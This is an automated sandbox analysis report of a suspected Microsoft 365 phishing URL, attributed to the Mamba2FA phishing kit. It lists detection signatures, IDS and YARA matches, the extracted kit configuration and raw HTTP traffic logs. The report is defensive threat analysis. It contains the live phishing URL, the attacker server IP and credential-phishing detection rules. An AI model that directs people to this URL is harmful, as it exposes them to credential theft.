Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://betacambridge.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPVZuaHpSMUE9JnVpZD1VU0VSMjkxMDIwMjRVNDAxMDI5MjA=N0123N

Overview

General Information

Sample URL:https://betacambridge.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPVZuaHpSMUE9JnVpZD1VU0VSMjkxMDIwMjRVNDAxMDI5MjA=N0123N
Analysis ID:1558004
Infos:

Detection

HTMLPhisher, Mamba2FA
Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected phishing page
Antivirus / Scanner detection for submitted sample
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected HtmlPhish10
Yara detected Mamba 2FA PaaS
HTML body contains low number of good links
HTML body contains password input but no form action
HTML title does not match URL
Invalid 'forgot password' link found
Invalid T&C link found
Suricata IDS alerts with low severity for network traffic

Classification

  • System is w10x64
  • chrome.exe (PID: 5356 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 2084 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1200 --field-trial-handle=2008,i,4224708502505659071,8326428056869441000,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6420 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://betacambridge.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPVZuaHpSMUE9JnVpZD1VU0VSMjkxMDIwMjRVNDAxMDI5MjA=N0123N" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
{"sv": "o365_1_nom", "rand": "VnhzR1A=", "uid": "USER29102024U40102920"}
SourceRuleDescriptionAuthorStrings
1.1.pages.csvJoeSecurity_Mamba2FAYara detected Mamba 2FA PaaSJoe Security
    1.1.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
      1.0.pages.csvJoeSecurity_Mamba2FAYara detected Mamba 2FA PaaSJoe Security
        1.0.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
          No Sigma rule has matched
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-18T21:15:47.340844+010020563161Successful Credential Theft Detected192.168.2.449739192.232.223.48443TCP
          2024-11-18T21:15:48.754826+010020563161Successful Credential Theft Detected192.168.2.449743192.232.223.48443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-18T21:15:45.739599+010020566432Possible Social Engineering Attempted192.168.2.449735192.232.223.48443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-18T21:15:45.602122+010020573331Successful Credential Theft Detected192.168.2.449736192.232.223.48443TCP

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: https://betacambridge.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPVZuaHpSMUE9JnVpZD1VU0VSMjkxMDIwMjRVNDAxMDI5MjA=N0123NSlashNext: detection malicious, Label: Credential Stealing type: Phishing & Social Engineering
          Source: 1.0.pages.csvMalware Configuration Extractor: Mamba2FA {"sv": "o365_1_nom", "rand": "VnhzR1A=", "uid": "USER29102024U40102920"}

          Phishing

          barindex
          Source: https://betacambridge.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPVZuaHpSMUE9JnVpZD1VU0VSMjkxMDIwMjRVNDAxMDI5MjA=N0123NJoe Sandbox AI: Score: 9 Reasons: The brand 'Microsoft' is well-known and typically associated with the domain 'microsoft.com'., The URL 'betacambridge.com' does not match the legitimate domain for Microsoft., The URL does not contain any direct reference to Microsoft, which is suspicious., The presence of input fields related to account access and creation is typical for phishing sites attempting to harvest credentials., The domain 'betacambridge.com' does not have any known association with Microsoft. DOM: 1.1.pages.csv
          Source: Yara matchFile source: 1.1.pages.csv, type: HTML
          Source: Yara matchFile source: 1.0.pages.csv, type: HTML
          Source: Yara matchFile source: 1.1.pages.csv, type: HTML
          Source: Yara matchFile source: 1.0.pages.csv, type: HTML
          Source: https://betacambridge.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPVZuaHpSMUE9JnVpZD1VU0VSMjkxMDIwMjRVNDAxMDI5MjA=N0123NHTTP Parser: Number of links: 0
          Source: https://betacambridge.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPVZuaHpSMUE9JnVpZD1VU0VSMjkxMDIwMjRVNDAxMDI5MjA=N0123NHTTP Parser: <input type="password" .../> found but no <form action="...
          Source: https://betacambridge.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPVZuaHpSMUE9JnVpZD1VU0VSMjkxMDIwMjRVNDAxMDI5MjA=N0123NHTTP Parser: Title: Authenticating ... does not match URL
          Source: https://betacambridge.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPVZuaHpSMUE9JnVpZD1VU0VSMjkxMDIwMjRVNDAxMDI5MjA=N0123NHTTP Parser: Invalid link: Forgot password?
          Source: https://betacambridge.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPVZuaHpSMUE9JnVpZD1VU0VSMjkxMDIwMjRVNDAxMDI5MjA=N0123NHTTP Parser: Invalid link: Terms of use
          Source: https://betacambridge.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPVZuaHpSMUE9JnVpZD1VU0VSMjkxMDIwMjRVNDAxMDI5MjA=N0123NHTTP Parser: Invalid link: Privacy & cookies
          Source: https://betacambridge.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPVZuaHpSMUE9JnVpZD1VU0VSMjkxMDIwMjRVNDAxMDI5MjA=N0123NHTTP Parser: Invalid link: Terms of use
          Source: https://betacambridge.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPVZuaHpSMUE9JnVpZD1VU0VSMjkxMDIwMjRVNDAxMDI5MjA=N0123NHTTP Parser: Invalid link: Privacy & cookies
          Source: https://betacambridge.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPVZuaHpSMUE9JnVpZD1VU0VSMjkxMDIwMjRVNDAxMDI5MjA=N0123NHTTP Parser: <input type="password" .../> found
          Source: https://betacambridge.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPVZuaHpSMUE9JnVpZD1VU0VSMjkxMDIwMjRVNDAxMDI5MjA=N0123NHTTP Parser: No favicon
          Source: https://betacambridge.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPVZuaHpSMUE9JnVpZD1VU0VSMjkxMDIwMjRVNDAxMDI5MjA=N0123NHTTP Parser: No favicon
          Source: https://betacambridge.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPVZuaHpSMUE9JnVpZD1VU0VSMjkxMDIwMjRVNDAxMDI5MjA=N0123NHTTP Parser: No <meta name="author".. found
          Source: https://betacambridge.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPVZuaHpSMUE9JnVpZD1VU0VSMjkxMDIwMjRVNDAxMDI5MjA=N0123NHTTP Parser: No <meta name="author".. found
          Source: https://betacambridge.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPVZuaHpSMUE9JnVpZD1VU0VSMjkxMDIwMjRVNDAxMDI5MjA=N0123NHTTP Parser: No <meta name="copyright".. found
          Source: https://betacambridge.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPVZuaHpSMUE9JnVpZD1VU0VSMjkxMDIwMjRVNDAxMDI5MjA=N0123NHTTP Parser: No <meta name="copyright".. found
          Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49742 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49744 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.4:49767 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.4:49774 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:49775 version: TLS 1.2

          Networking

          barindex
          Source: Network trafficSuricata IDS: 2056316 - Severity 1 - ET PHISHING Generic Credential Phish Landing Page (jsnom.js) : 192.168.2.4:49739 -> 192.232.223.48:443
          Source: Network trafficSuricata IDS: 2056316 - Severity 1 - ET PHISHING Generic Credential Phish Landing Page (jsnom.js) : 192.168.2.4:49743 -> 192.232.223.48:443
          Source: Network trafficSuricata IDS: 2057333 - Severity 1 - ET PHISHING MAMBA Credential Phish Landing Page 2024-11-08 : 192.168.2.4:49736 -> 192.232.223.48:443
          Source: Network trafficSuricata IDS: 2056643 - Severity 2 - ET PHISHING Javascript Browser Fingerprinting POST Request : 192.168.2.4:49735 -> 192.232.223.48:443
          Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
          Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
          Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
          Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
          Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
          Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
          Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
          Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
          Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
          Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
          Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
          Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
          Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
          Source: unknownTCP traffic detected without corresponding DNS query: 93.184.221.240
          Source: unknownTCP traffic detected without corresponding DNS query: 93.184.221.240
          Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
          Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
          Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
          Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
          Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
          Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
          Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
          Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
          Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
          Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
          Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
          Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
          Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
          Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
          Source: unknownTCP traffic detected without corresponding DNS query: 93.184.221.240
          Source: global trafficHTTP traffic detected: GET /n/?c3Y9bzM2NV8xX25vbSZyYW5kPVZuaHpSMUE9JnVpZD1VU0VSMjkxMDIwMjRVNDAxMDI5MjA=N0123N HTTP/1.1Host: betacambridge.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /n/jsnom.js HTTP/1.1Host: betacambridge.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://betacambridge.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPVZuaHpSMUE9JnVpZD1VU0VSMjkxMDIwMjRVNDAxMDI5MjA=N0123NAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /4.7.5/socket.io.min.js HTTP/1.1Host: cdn.socket.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://betacambridge.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://betacambridge.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /n/jsnom.js HTTP/1.1Host: betacambridge.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://betacambridge.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://betacambridge.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/picker_verify_fluent_authenticator_59892f1e05e3adf9fd2f71b42d92a27f.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://betacambridge.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: betacambridge.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://betacambridge.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPVZuaHpSMUE9JnVpZD1VU0VSMjkxMDIwMjRVNDAxMDI5MjA=N0123NAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
          Source: global trafficHTTP traffic detected: GET /4.7.5/socket.io.min.js HTTP/1.1Host: cdn.socket.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/picker_verify_sms_12b7d768ba76f2e782cc74e328171091.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://betacambridge.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg HTTP/1.1Host: logincdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://betacambridge.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/picker_verify_code_b41922ebdaebec16b19999fc6054a15a.svg HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://betacambridge.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /w3css/4/w3.css HTTP/1.1Host: www.w3schools.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://betacambridge.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/picker_verify_fluent_authenticator_59892f1e05e3adf9fd2f71b42d92a27f.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/picker_verify_sms_12b7d768ba76f2e782cc74e328171091.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg HTTP/1.1Host: logincdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2020/06/cropped-Beta-cambridge-school-logo-1-32x32.png HTTP/1.1Host: www.betacambridge.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://betacambridge.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/picker_verify_code_b41922ebdaebec16b19999fc6054a15a.svg HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2020/06/cropped-Beta-cambridge-school-logo-1-32x32.png HTTP/1.1Host: www.betacambridge.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=sf5TlgucR5x5beL&MD=9P9yO15X HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
          Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=sf5TlgucR5x5beL&MD=9P9yO15X HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
          Source: global trafficHTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
